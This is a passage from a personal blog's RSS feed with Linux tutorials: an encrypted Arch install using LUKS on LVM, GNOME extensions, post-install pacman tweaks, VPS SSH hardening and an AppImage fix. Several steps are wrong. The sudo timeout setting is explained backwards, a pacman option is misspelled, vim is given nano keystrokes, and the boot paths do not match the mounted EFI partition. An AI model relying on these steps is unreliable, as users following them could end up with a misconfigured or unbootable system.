Adding NTFS filesystem support on Arch Linux and Gentoo is a crucial step toward achieving a seamless cross-platform experience. Both distributions provide straightforward solutions to address the compatibility challenge, highlighting their commitment to user empowerment and system customization. By implementing these solutions, you empower your Linux environment to work harmoniously with Windows-based systems, enhancing your ability to manage and share data across different platforms.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Complete Guide to setting up LUKS on LVM encryption in Arch Linux (Minimal System)</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd/</guid><description>A detailed guide on setting up LUKS (Linux Unified Key Setup) encryption on LVM. with Minimal system installation.</description><pubDate>Wed, 09 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Setting Up LUKS Encryption

Welcome to a detailed guide on setting up LUKS (Linux Unified Key Setup) encryption (LVM) as part of your Arch Linux installation process. LUKS encryption provides an additional layer of security for your data.

## Enabling Time Synchronization

Before delving into encryption, it&apos;s essential to ensure accurate timekeeping on your system. Enabling Network Time Protocol (NTP) synchronization will synchronize your system&apos;s clock with remote servers.

```shell
timedatectl set-ntp true
```

## Partition Setup

Before installing Arch Linux, you need to partition your disk. You can use tools like `cfdisk`, `fdisk`, or `gdisk` for this purpose. In this guide, we will use `gdisk`.

The parition layout will be using LVM, so there only contains 2 partitions.

First off, you need to know which storage devices you want to partition and that name of the device. You can list the available storage devices using the following command:

```shell
lsblk
```

2. Initialize and Create Partitions: Utilize the `gdisk` tool to initialize your disk and create the necessary partitions:

```shell
gdisk /dev/sda
```

   While inside the `gdisk` interface, execute the following actions:

   - Type `o` to create a new GPT partition table and confirm with `y`.
   - Create the EFI boot partition by typing `n`, followed by `Enter` first sector, `+1G` for the last sector, and `ef00` for the partition type code.
   - Create the LVM with LUKS partition by typing `n`, followed by `Enter` until the type code prompt, then `8e00` for the partition type code.
   - Save your modifications with `w` and confirm the changes by typing `y`.

Your disk should now have the following partitions:

| Size   | Type                | Code  |
|--------|---------------------|-------|
| 1G     | EFI System          | ef00  |
| 100G   | Linux LVM           | 8e00  |

## Format Boot Partition

Our partition layout is ready, now we need to format the partitions. We will start by formatting the EFI boot partition. formatted as FAT32. This filesystem format aligns with UEFI booting requirements.

```shell
mkfs.fat -F32 /dev/sda1
```

## Encrypt Your Partition (LUKS)

Configure encryption using LUKS (Linux Unified Key Setup) and create logical volumes to efficiently manage your filesystem.

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sda2

YES
```

   This command initiates the LUKS encryption process with specific parameters:

   - `--type luks2`: Selects LUKS version 2 for encryption.
   - `--cipher aes-xts-plain64`: Chooses the AES encryption algorithm in XTS mode.
   - `--hash sha256`: Specifies SHA-256 as the hash function.
   - `--iter-time 10000`: Sets the time for key derivation iterations.
   - `--key-size 256`: Determines the key size in bits.
   - `--pbkdf argon2id`: Selects the Argon2id key derivation function.
   - `--use-urandom`: Utilizes the `/dev/urandom` entropy source.
   - `--verify-passphrase`: Ensures you verify your chosen passphrase.

   Follow the prompts and input your chosen passphrase when prompted. Remember that this passphrase will be required to unlock and access the encrypted partition.

## Open the Encrypted Partition

LUKS partition is encrypted, for open it:

```shell
cryptsetup open /dev/sda2 crypt
```

This command opens the encrypted partition and maps it to the `crypt` device. and have a new mapper named as `crypt`.

## Create Physical and Logical Volumes

Next, you&apos;ll create physical and logical volumes to manage your filesystem efficiently. These volumes will serve as the foundation for your Arch Linux installation.

Create a physical volume:

```shell
pvcreate /dev/mapper/crypt
```

Create a volume group named `vol`:

```shell
vgcreate vol /dev/mapper/crypt
```

Create logical volumes for swap, root, and home directories:

```shell
lvcreate -L 12G vol -n swap
lvcreate -l 50%FREE vol -n root
lvcreate -l 100%FREE vol -n home
```

These commands create logical volumes for the swap, root, and home directories, allocating the desired percentage of space for each volume. For the

## Format and Mount Partitions

In this step, we will format and mount the partitions necessary for the Arch Linux installation. Properly configuring these partitions is crucial for ensuring a stable and functional system. We&apos;ll cover formatting the `root` and `home` volumes, as well as creating and enabling swap space. Let&apos;s delve into the details:

### Root and Home

We&apos;ll need to format the `root` and `home` volumes with btrfs filesystem. To format the `root` and `home` volumes with the Btrfs filesystem, execute the following commands:

```shell
mkfs.btrfs /dev/vol/root &amp;&amp; mkfs.btrfs /dev/vol/home
```

### Swap

Swap space is an integral part of your system&apos;s memory management. It provides additional virtual memory when physical RAM is fully utilized. Creating and enabling swap space ensures that your system can handle memory-intensive tasks without performance degradation.

To create and enable swap space on the designated `swap` logical volume, use these commands:

```shell
mkswap /dev/vol/swap &amp;&amp; swapon /dev/vol/swap
```

### Mount Root and Home Partitions

Time to mount the `root` and `home` partitions to the `/mnt` directory. Execute the following commands:

```shell
mount /dev/vol/root /mnt
```

```shell
mount /dev/vol/home --mkdir /mnt/home
```

&gt;The EFI partition will not be mounted here, we&apos;ll mount it after chrooting into the new system.

## Install Essential Packages

This is the time to install essential packages that form the core of your Arch Linux system. These packages provide foundational tools and utilities that enable system management, software development, and hardware compatibility.

```shell
pacstrap -i /mnt base base-devel linux linux-firmware linux-headers lvm2 vim networkmanager sudo
```

## Automate Mounts with the `fstab` File

To ensure that your filesystems are automatically mounted during system boot, you need to generate the `/etc/fstab` file. This file contains information about your partitions and their mount points, enabling the system to mount them correctly.

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

## Chroot into the New System

To enter this new system environment, type the following command:

```shell
arch-chroot /mnt
```

## Initialize the Pacman Keyring

Better to refresh the pacman keyring, execute the following commands:

```shell
pacman-key --init &amp;&amp; pacman-key --populate archlinux
```

## Enable Network Services

Enable the NetworkManager service to manage network connections.

```shell
systemctl enable NetworkManager
```

## Set the System Locale

Configuring the system locale is an essential task to ensure proper language support and effective localization within your Arch Linux environment. The system locale defines the language, character encoding, and other regional settings that your system will use.

Execute the following command to open the `locale.gen` file in the `vim` text editor:

```shell
vim /etc/locale.gen
```

3. Inside the text editor, navigate to the line that corresponds to your desired locale. For instance, to enable the English (United States) locale, find the line containing `en_US` and remove the `#` symbol at the beginning of the line.

4. Save the file and exit the text editor.

5. Generate the selected locale by running the command:

```shell
locale-gen
```

This command generates the necessary locale files based on your configuration.

6. Set the system&apos;s default locale by entering the following command:

```shell
echo LANG=en_US.UTF-8 &gt; /etc/locale.conf
```

## Set User Passwords

User account management is a crucial aspect of system security. Follow these steps to establish secure passwords for both the root user and a new user:

1. Set the root password by entering the following command and following the prompts:

```shell
passwd
```

2. Create a new user account using the `useradd` command. Replace `username` with the desired username:

```shell
useradd -m username
```

3. Set the password for the newly created user by running the following command and following the prompts:

```shell
passwd username
```

## Basic group allocation

To ensure that your user account has the necessary permissions to perform system tasks, allocate the user to essential groups.

```shell
usermod -aG wheel,storage,power username
```

## Configure sudoers file

sudo aren&apos;t allowed by default, you need to enable it by editing the sudoers file.

```shell
EDITOR=vim visudo
```

3. Uncomment the line `%wheel ALL=(ALL) ALL` by removing the `#` symbol at the beginning of the line.

### Timestamp Timeout

To avoid the entering password delay every time, you can set the timestamp timeout to 0.

```shell
Defaults timestamp_timeout=0
```

## Set Hostname

Assigning a hostname to your Arch Linux system is essential for network identification. As example, we will set the hostname to `arch`.

```shell
echo arch &gt; /etc/hostname
```

## Set Hosts File

To associate the hostname with the loopback address, modify the `/etc/hosts` file, adding the following line:

```shell
127.0.0.1 localhost
::1       localhost
127.0.0.1 arch.localdomain  localhost
```

## Set Timezone

Configuring the correct timezone ensures accurate timekeeping on your Arch Linux system. to do this, create a symbolic link to the appropriate timezone file and synchronize the hardware clock with the system time. As example, we will set the timezone to `Asia/Taipei`.

```shell
ln -sf /usr/share/zoneinfo/Asia/Taipei /etc/localtime
```

Synchronize the hardware clock with the system time:

```shell
hwclock --systohc
```

## Configure mkinitcpio

You need to configure `mkinitcpio` to include necessary modules for LVM2 and encryption support. This step ensures your encrypted partitions can be properly accessed during the boot process. Edit the `/etc/mkinitcpio.conf` file:

1. Locate the `HOOKS` line and add `lvm2` and `encrypt` to the list of hooks. Your modified line should look like this:

   ```shell
   HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block lvm2 encrypt filesystems fsck)
   ```

3. Save the file and exit the text editor.

4. Regenerate the initramfs with the updated configuration:

   ```shell
   mkinitcpio -p linux
   ```

## Format and Mount EFI Partition

It&apos;s time to format the EFI partition and mount it to the `/boot/efi` directory. Execute the following commands:

```
mkfs.fat -F32 /dev/sda1
```

and mount it:

```shell
mount /dev/sda1 --mkdir /boot/efi
```

## Install and Configure Bootctl

Now, we&apos;ll configure the systemd-boot bootloader to manage the boot process for your Arch Linux system.

1. Install `bootctl` to the `/boot/efi` directory:

   ```shell
   bootctl --path=/boot/efi install
   ```

2. Open the `loader.conf` file for editing using the `vim` text editor:

   ```shell
   vim /boot/loader/loader.conf
   ```

3. Inside the text editor, add the following lines to set the default boot options:

   ```shell
   default arch
   timeout 10
   editor 0
   ```

4. Save the file and exit the text editor.

5. Create a boot entry for your Arch Linux installation in the bootloader configuration. This ensures that you can easily select Arch Linux during boot.

   ```shell
   vim /boot/loader/entries/arch.conf
   ```

6. Inside the text editor, add the following lines to specify the Linux kernel and initramfs files:

   ```shell
   title Arch linux
   linux /vmlinuz-linux
   initrd /initramfs-linux.img
   ```

7. Save the file and exit the text editor.

### Add Encryption Options

To ensure that your encrypted partition is properly decrypted during the boot process, you need to add encryption options to the bootloader configuration. This step is crucial for seamless decryption and access to your encrypted root volume.

1. Add the UUID of the encrypted partition to the bootloader configuration. First, obtain the UUID of the encrypted partition using the `blkid` command:

    ```shell
    blkid /dev/sda2 &gt;&gt; /boot/loader/entries/arch.conf
    ```

2. Now, reopen the `arch.conf` file for further editing:

   ```shell
   vim /boot/loader/entries/arch.conf
   ```

3. Refine the following lines within the file to precisely outline the encryption options, while replacing `&lt;UUID&gt;` with the actual UUID obtained in the previous step:

   ```shell
   options cryptdevice=UUID=&lt;UUID&gt;:cryptlvm root=/dev/vol/root quiet rw
   ```

4. Save the file and exit the text editor.

#### Finalize Boot Configuration

And this is the sample of the `arch.conf` file, you should similar to this, if you done correctly.

```shell
title Arch linux
linux /vmlinuz-linux
initrd /initramfs-linux.img

options cryptdevice=UUID=&lt;UUID&gt;:cryptlvm root=/dev/vol/root quiet rw
```

## Finish Installation

After completing these steps,  Now exit your current user then umount your arch system. You can enjoy your new Arch Linux system with LUKS encryption. (But no GUI XD)

```shell
exit
umount -R /mnt
```

you can proceed to reboot your system.

```shell
reboot
```

## References

- [No mkinitcpio preset present](https://unix.stackexchange.com/questions/571124/no-mkinitcpio-preset-present)
- [Installation guide](https://wiki.archlinux.org/title/Installation_guide)
- [How to Dual Boot Arch Linux and Windows 11/10](https://onion.tube/watch?v=JRdYSGh-g3s)
- [Como instalar ArchLinux com UEFI criptografia LUKS](https://onion.tube/watch?v=K4pcd0B_eGk)
- [[1d] | Arch Linux Base Install on UEFI with LUKS Encryption](https://onion.tube/watch?v=XNJ4oKla8B0)
- [Create LUKS encrypted root and efi boot partitions for Arch Linux](https://onion.tube/watch?v=cxMYR617a5E)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Discover the Top 10 Essential Gnome Extensions</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-useful-extensions/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-useful-extensions/</guid><description>Unlock the Power of Gnome with These Must-Have Extensions!</description><pubDate>Fri, 04 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Gnome extensions are plug-ins designed for gnome users to enhance your experience when using gnome. In this article I will list some gnome plug-ins that I find useful.

## How to install

Enhance your GNOME desktop experience by effortlessly installing useful extensions through your web browser. Follow these steps for a smooth setup:

### 1. Install Browser Extensions

First go this [website](https://extensions.gnome.org/)install the extensions GNOME Shell integration. Without this extensions you cannot install from browser.

### 2. Install the GNOME Browser Connector

To enable seamless extension installation and connect the extensions from browser, you need install this package on your system, start by installing the necessary package:

```shell
sudo pacman -S gnome-browser-connector
```

###  Recommended Extensions

Explore these recommended GNOME extensions that can enhance your desktop functionality:

#### KStatus
- **Link**: [KStatus Extension](https://extensions.gnome.org/extension/615/appindicator-support/)
- **Description**: This extension provides support for app indicators, making it easier to manage and access applications from your system tray.

#### Clipboard History
- **Link**: [Clipboard History Extension](https://extensions.gnome.org/extension/4839/clipboard-history/)
- **Description**: Manage and access a history of your clipboard contents for more efficient copying and pasting.

#### Dash to Dock
- **Link**: [Dash to Dock Extension](https://extensions.gnome.org/extension/307/dash-to-dock/)
- **Description**: Transform your GNOME dash into a dock-style interface, allowing quick access to your favorite applications and improved multitasking.

#### Kernel Indicator
- **Link**: [Kernel Indicator Extension](https://extensions.gnome.org/extension/2512/kernel-indicator/)
- **Description**: Monitor and display your kernel version conveniently in your top panel, keeping you informed about your system&apos;s core.

#### Panel Date Format
- **Link**: [Panel Date Format Extension](https://extensions.gnome.org/extension/3465/panel-date-format/)
- **Description**: Customize the date and time format in your top panel to match your preferences and stay organized.

#### Resource Monitor
- **Link**: [Resource Monitor Extension](https://extensions.gnome.org/extension/1634/resource-monitor/)
- **Description**: Keep a close eye on your system&apos;s resource usage with a dedicated resource monitor directly in your top panel.

#### TopHat
- **Link**: [Resource Monitor Extension](https://extensions.gnome.org/extension/5219/tophat/)
- **Description**: TopHat aims to be an elegant system resource monitor for the GNOME shell. It displays CPU, memory, disk, and network activity in the GNOME top bar.

#### Blur my Shell
- **Link**: [Blur my Shell](https://extensions.gnome.org/extension/3193/blur-my-shell/)
- **Description**: Adds a blur look to different parts of the GNOME Shell, including the top panel, dash and overview.

By effortlessly installing these extensions, you can tailor your GNOME desktop to your workflow, optimizing productivity and functionality.

## Conclusion

Installing GNOME extensions using your web browser is a convenient way to personalize and enhance your desktop environment. With the help of the GNOME Browser Connector and a selection of recommended extensions, you can seamlessly add new features and improve your daily computing experience. Experiment with different extensions to discover the ones that best suit your needs and streamline your workflow.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>After installed Arch Linux 10 key common tasks</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-after-install-most-do-things/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-after-install-most-do-things/</guid><description>top 10 crucial tasks to perform after installing Arch Linux for an optimized and enriched experience.</description><pubDate>Fri, 04 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Setting Up Arch Linux (Keep update)

Once you have Arch Linux installed, there are a few key tasks you should complete to optimize your experience. Let&apos;s walk through them:

As a Arch linux user, installing package is a optinonal task, but it is the common task that you might want to do. Here&apos;re some common tasks that you might want to do after installing Arch Linux :)

### 1. Activate Multilib Repositories

Enhance your Arch Linux system&apos;s versatility by enabling the multilib repositories, which provide support for running both 32-bit and 64-bit applications. Follow these steps to activate multilib repositories:

1. Open your terminal application.

2. Type the following command and press Enter to open the `pacman.conf` file in the vim text editor:

   ```shell
   sudo vim /etc/pacman.conf
   ```

3. In the text editor, navigate to the `[multilib]` section. It should look similar to this:

   ```plaintext
   [multilib]
   Include = /etc/pacman.d/mirrorlist
   ```

4. Remove the `#` character at the beginning of the `[multilib]` line to uncomment it.

5. Save the changes you made by pressing `Ctrl + O`, then press Enter. Exit the text editor by pressing `Ctrl + X`.

6. To update the package database and synchronize the multilib repositories for the first time, execute the following command:

```shell
sudo pacman -Sy
```

By completing these steps, you&apos;ve successfully activated the multilib repositories on your Arch Linux system. This enables you to run a wider range of applications and ensures better compatibility.

### 2. Optimize Package Mirrors with Reflector

Using the original mirrorlist is not the best approach. Since this is not a file location close to your location, however using Reflector you can download these packages directly using the location of the country you want. Here is step:

1. Run the following command to install reflector:

```shell
sudo pacman -S reflector
```

2. getting the lastest 10 mirrors based on your country.

```shell
sudo reflector --verbose --country &lt;your_country&gt; -l 10 --sort rate --save /etc/pacman.d/mirrorlist --protocol https
```

- `--protocol https`: Specifies to use HTTPS protocol for fetching mirror information.
- `--country &lt;your_country_code&gt;`: Replace `&lt;your_country_code&gt;` with the code of your country (e.g., `us` for the United States, `ca` for Canada).
- `--verbose`: Enables verbose output to see the log of the process.
- `-l 10`: Retrieves the latest 10 mirrors based on specified criteria.
- `--sort rate`: Sorts the mirrors by download rate (speed).
- `--save /etc/pacman.d/mirrorlist`: Saves the optimized mirrorlist to the specified path.

```shell
sudo pacman -Sy
```

By running this command, you&apos;ll efficiently optimize your mirrorlist, ensuring faster and more reliable package downloads and update the package database and synchronize the mirrorlist for the first time.

### 3. Enhance Visual Experience

Elevate your Arch Linux environment with captivating visual enhancements. Follow these simple steps to breathe life into your interface:

#### 3.2 Enable &quot;Candy&quot; Animation with `ILoveCandy`

Enhance your download progress visualization with the playful &quot;Candy&quot; animation, reminiscent of a snake eating your progress bar. Follow these steps to enable it:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, navigate to the `[options]` section.

3. Uncomment this flag to enable the &quot;Candy&quot; Animation:

   ```shell
   ILoveCandy
   ```

4. Save the file by pressing `Ctrl + S`, then exit the text editor by pressing `Ctrl + X`.

5. Your process bar will now display the engaging &quot;Candy&quot; animation!

#### 3.3 Infuse Vibrancy with &quot;Color&quot;

Enhance the clarity of your verbose information by enabling colorful output with the &quot;Color&quot; setting. Say goodbye to plain black and white text:

1. Open your terminal application.

2. Type the following command and press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

3. In the text editor, locate the `[options]` section.

4. Uncomment this flag to enable colorful output:

   ```shell
   Color
   ```

5. Save the file by pressing `Ctrl + S`, then exit the text editor by pressing `Ctrl + X`.

#### 3.4 Clearer Verbose Information with &quot;VerbosePkgLists&quot;

Make your package information crystal clear by enabling &quot;VerbosePkgLists.&quot; This option separates each package onto its own line, displaying both the old and new versions distinctly:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, locate the `[options]` section.

3. Uncomment this flag to enable VerbosePkgLists output:

   ```shell
   VerbosePkgLists
   ```

4. Save the file by pressing `Ctrl + S`, then exit the text editor by pressing `Ctrl + X`.

### 4. Multi-threaded Package Downloads with `ParallelDownload`

Optimize your package downloads by utilizing multiple threads with `ParallelDownload`. Instead of downloading one file at a time, you can specify the number of concurrent downloads to speed up the process:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, locate the `[options]` section.

3. Add the following line to enable ParallelDownload with, for example, 5 concurrent downloads:

   ```shell
   ParallelDownload 5
   ```

4. Save the file by pressing `Ctrl + S`, then exit the text editor by pressing `Ctrl + X`.

Now you can enjoy faster downloads with the ability to retrieve multiple files simultaneously!

### 5. Install Game Drivers (AMDGPU Users)

For those using AMDGPU, elevate your gaming potential. Execute:

```shell
sudo pacman -Sy
sudo pacman -S lib32-mesa mesa \
lib32-vulkan-radeon vulkan-radeon \
amdvlk \
xf86-video-amdgpu
```

### 6. Gnome Users: Enhance Browsing Experience

For Gnome users, elevate your browsing capabilities with the gnome-browser-connector. Install it using:

```shell
sudo pacman -S gnome-browser-connector
```

Once installed, you&apos;ll be able to effortlessly install extensions from [https://extensions.gnome.org/](https://extensions.gnome.org/).

By completing these tasks, you&apos;ll optimize your Arch Linux environment, enriching your experience and unleashing its full potential. Enjoy your enhanced system!

### 7. Customize Your GNOME Environment

Arch Linux offers a default GNOME environment that&apos;s visually appealing, but you still can customize it to reflect your unique style and preferences.

### 8: Install Yay AUR Helper

Simplifying software management on Arch Linux is the `yay` package manager, designed to streamline the acquisition and organization of software from the Arch User Repository (AUR)—a vibrant hub of community-contributed packages. Depending on your preference for customization and speed.

1. **Install Git and Essential Development Tools:**

   Start by laying a solid foundation with essential development tools from the `base` and `base-devel` package groups. If these are not present, you can install them with the command:

   ```shell
   sudo pacman -S git base base-devel
   ```

2. **Installing `yay` for Customization:**

   If you&apos;re inclined towards customization and don&apos;t mind investing a bit more time, consider building `yay` from source. Begin by cloning the `yay` repository from the Arch User Repository (AUR) using:

   ```shell
   git clone https://aur.archlinux.org/yay.git
   ```

   Navigate to the cloned `yay` folder:

   ```shell
   cd yay
   ```

   Build and install `yay` with the following commands:

   ```shell
   makepkg -si
   ```

   Respond to prompts and grant necessary permissions during installation.

3. **Start Using `yay`:**

   ```shell
   yay -S &lt;package-name&gt;
   ```

### 9. Install Your Daily Software

With your Arch Linux system set up and customized, it&apos;s time to install some essential software that you use on a daily basis.
Install the Firefox web browser and VLC media player using the `yay` AUR helper.

#### Install Firefox

   To install Firefox, use the following command:

   ```shell
   sudo pacman -S firefox
   ```

#### Install VLC

   To install VLC media player, use the following command:

   ```shell
   sudo pacman -S vlc
   ```

With Firefox and VLC installed, you now have access to a web browser and media player, allowing you to browse the web and enjoy multimedia content on your Arch Linux system.

### 10. Install Firewall (UFW)

When it comes to securing your system, a firewall plays a crucial role in controlling incoming and outgoing network traffic. While Arch Linux doesn&apos;t come with a pre-installed firewall, you can easily set up the Uncomplicated Firewall (UFW) to manage network access.

   #### Install UFW

   open a terminal and enter the following command:

   ```shell
   sudo pacman -S ufw
   ```

   #### Enable UFW

   After installing UFW, enable it with the following command:

   ```shell
   sudo ufw enable
   ```

Once UFW is enabled, you can start managing your firewall rules to enhance the security of your Arch Linux system. Don&apos;t forget to configure UFW rules to allow necessary network services while blocking unauthorized access.

## Conclusion

By following these steps, you&apos;ve covered some of the most essential tasks to set up and optimize your Arch Linux system for daily use. Whether you&apos;re browsing the web, enjoying multimedia, or ensuring network security, you&apos;re well-equipped to make the most out of your Arch Linux experience.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Tips to Secure your linux VPS server</title><link>https://ummit.dev//posts/linux/self-host/ssh-secure/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/ssh-secure/</guid><description>Learn how to effortlessly secure your VPS server with just a few essential steps. This blog will guide you through the process.</description><pubDate>Wed, 28 Jun 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Securing your VPS hosting server is paramount before exposing it to the public. Here&apos;s how you can bolster your server&apos;s defenses.

### 1. Regularly Update Your System

Keeping your Linux system up to date is vital for security. Regularly apply security updates using the following commands:

```shell
sudo apt-get update -y
sudo apt-get upgrade -y
```

### 2. Add a New User with Sudo Privileges

Improving security involves creating a new user with administrative capabilities:

1. Create a New User:
   Add a new user to your system, replacing `newusername` with your preferred username.

   ```shell
   sudo adduser newusername
   ```

2. Grant Sudo Privileges:
   Enable the new user to use the `sudo` command by adding them to the sudo group.

   ```shell
   sudo usermod -aG sudo newusername
   ```

3. Test Sudo Access:
   Verify that the new user can use `sudo` by switching to their account and running a test command.

   ```shell
   su - newusername
   sudo ls -la /root
   ```

4. Exit User Account:
   Once the test is complete, exit the new user&apos;s account.

   ```shell
   exit
   ```

5. Access sudoers File:
   To edit the sudoers file, use:

   - If you&apos;re currently logged in as root:

   ```shell
   visudo
   ```

   - If you&apos;re logged in as a non-root user with sudo privileges:

   ```shell
   sudo visudo
   ```

6. Edit with Ease:
   The visudo command typically uses the nano text editor, making it user-friendly. Navigate with arrow keys and locate the line resembling:

   ```shell
   root    ALL=(ALL:ALL) ALL
   ```

7. Add User to sudoers:
   Below the mentioned line, add the highlighted line (replace `newuser` with the actual username):

   ```shell
   root    ALL=(ALL:ALL) ALL
   newusername ALL=(ALL:ALL) ALL
   ```

8. Save and Exit:
   Save your changes and exit the editor.

These steps grant specific users sudo privileges, allowing them to execute administrative commands while maintaining a secure server environment.

### 3. Avoid Password Login

Enhance security by disabling password-based logins and exclusively utilizing SSH key authentication.

```shell
PasswordAuthentication no
```

### 4. Use SSH Key Authentication

For authentication, use SSH key pairs. Generate a key pair on your local machine and add the public key to the server&apos;s `~/.ssh/authorized_keys` file.

```shell
ssh-keygen -t rsa
ssh-copy-id newusername@your_server_ip
```

### 5. Install a Firewall &amp; Change SSH Port Number

Fortify your server&apos;s security by configuring a firewall and modifying the SSH port number:

1. Install UFW (Uncomplicated Firewall):
   Begin by installing the Uncomplicated Firewall, which simplifies managing firewall rules.

   ```shell
   sudo apt-get install ufw
   ```

2. Enable UFW:
   Activate UFW and ensure it starts automatically at boot.

   ```shell
   sudo ufw enable
   ```

3. Allow SSH Traffic on Custom Port:
   Permit SSH traffic on the custom port you&apos;ve chosen (replace `your_custom_port_number` with your desired port).

   ```shell
   sudo ufw allow your_custom_port_number/tcp
   ```

4. Change SSH Port Number:
   Modify the default SSH port (22) to your chosen custom port. This adds an extra layer of security by moving SSH away from the default port.

   ```shell
   sudo nano /etc/ssh/sshd_config
   # Change &apos;Port 22&apos; to &apos;Port your_custom_port_number&apos;
   # Save the file and exit the text editor
   sudo service sshd restart
   ```

By completing these steps, you establish a firewall, modify the SSH port, and enhance your server&apos;s security, reducing potential threats.

### 6. Restrict User Logins

Allow only specific users to log in via SSH. Edit the SSH configuration file (`/etc/ssh/sshd_config`).

```shell
AllowUsers newusername
```

### 7. Disable Root Login

Prevent direct root login via SSH. Edit the SSH configuration file.

```shell
PermitRootLogin no
```

### 8. Restrict Ping Responses

Disable ICMP ping responses to thwart potential reconnaissance attacks:

1. Open the UFW (Uncomplicated Firewall) configuration file:

   ```shell
   sudo nano /etc/ufw/before.rules
   ```

2. Add this line at the file&apos;s end to block ICMP echo request (ping) packets:

   ```shell
   -A ufw-before-input -p icmp --icmp-type echo-request -j DROP
   ```

3. Save the file and exit the text editor.

4. Reload the UFW rules to apply the changes:

   ```shell
   sudo ufw reload
   ```

5. Reboot your server to ensure the changes take effect:

   ```shell
   sudo reboot
   ```

By implementing these measures, you effectively prevent your server from responding to ICMP ping requests, reducing its exposure to potential reconnaissance attempts.

## Conclusion

Security is an ongoing process. Regularly review and update your security measures to adapt to emerging threats. By following these steps and using the provided command lines, you significantly enhance your VPS hosting server&apos;s security, ensuring a safer environment for your applications and data.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>dlopen() Error: Resolving Shared Library Issues on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-appimage-error/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-appimage-error/</guid><description>Discover effective solutions to tackle the elusive dlopen() error on Arch Linux. Learn how to troubleshoot shared library loading problems, fix application launch issues, and restore your system&apos;s stability.</description><pubDate>Tue, 14 Feb 2023 00:00:00 GMT</pubDate><content:encoded>## Resolving the dlopen() Error with Appimage on Arch Linux

The allure of an Appimage can quickly turn into frustration when an unexpected roadblock presents itself. You&apos;re greeted by a discouraging &quot;dlopen() error.&quot; This error, often tied to loading &quot;libfuse.so.2,&quot; can be a stumbling block, especially when dealing with applications that rely on FUSE (Filesystem in Userspace) features.

1. Install `fuse2` Using pacman:

   open your terminal and executing the following command:

   ```shell
   sudo pacman -S fuse2
   ```

   This essential step ensures that the necessary FUSE library, including &quot;libfuse.so.2,&quot; is readily available, thus paving the way for uninterrupted usage of FUSE-dependent applications.

2. **[Optional]** Install `fuse` and `squashfuse`:

   While not obligatory, this step can further enhance compatibility and provide a comprehensive approach to handling FUSE-related operations. You may choose to install `fuse` and `squashfuse` for an extended range of functionalities:

   ```shell
   sudo pacman -S fuse squashfuse
   ```

   Please note that this step is optional and primarily caters to specific use cases.

As you embark on this journey to troubleshoot the dlopen() error and ensure the harmonious execution of your chosen Appimage, remember that installing `fuse2` and, if desired, `fuse` and `squashfuse` lays the foundation for a seamless Appimage experience, free from the constraints of unresolved dependencies.

## How It Works

The installation of `fuse2` and, optionally, `fuse` and `squashfuse`, serves as a gateway to an enhanced Appimage adventure. These libraries form the bridge between FUSE-based applications and your system&apos;s filesystem, offering a conduit through which applications can interact and manipulate data as if they were operating at the kernel level.

By presenting these essential libraries, the notorious dlopen() error, often triggered by missing or mismatched dependencies, is effectively neutralized. When you fire up your Appimage, it elegantly loads and interacts with the necessary libraries, ensuring a seamless, error-free exploration of your chosen application.

## Reference

- https://github.com/m1911star/affine-client/issues/10</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Before You Buy a Raspberry Pi: Essential Considerations</title><link>https://ummit.dev//posts/linux/raspberry-pi/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/raspberry-pi/</guid><description>Everything you need to know before purchasing a Raspberry Pi including required accessories and use cases.</description><pubDate>Tue, 24 Jan 2023 00:00:00 GMT</pubDate><content:encoded>## What is Raspberry Pi?

In essence, Raspberry Pi is a versatile and compact computer system that operates exclusively with select Linux distributions. While its size might be modest, its capabilities are far-reaching, making it a popular choice for a range of projects and applications.

## Raspberry Pi: Pros and Cons

1. **Compact Size:**
   - The standout feature is its diminutive size, making it a portable and space-efficient computing solution.

However, beyond its sleek design, Raspberry Pi models may not offer significant advantages, especially when considering the market prices and availability.

## Raspberry Pi Ports

Examining the Raspberry Pi Model B, it boasts various ports for connectivity:

- Micro HDMI Port x2
- Power Port x1
- Ethernet Port x1
- Headphone Port x1
- USB 2.0x2
- USB 3.0x2
- Micro SD Card Port x1

## Practical Use Cases

What can you accomplish with this compact computer? Raspberry Pi can function much like any standard computer, suitable for everyday tasks. However, it often finds its niche as a hosting platform, serving admirably as a modest server.

![distro](https://hackster.imgix.net/uploads/attachments/1381275/image_nZIpjonlUU.png?auto=compress%2Cformat)

## Essential Considerations Before Purchase

Acquiring a Raspberry Pi entails more than just the device itself. Several additional components are essential for a seamless experience:

### 1. Power Supply - Opt for a Reliable Source

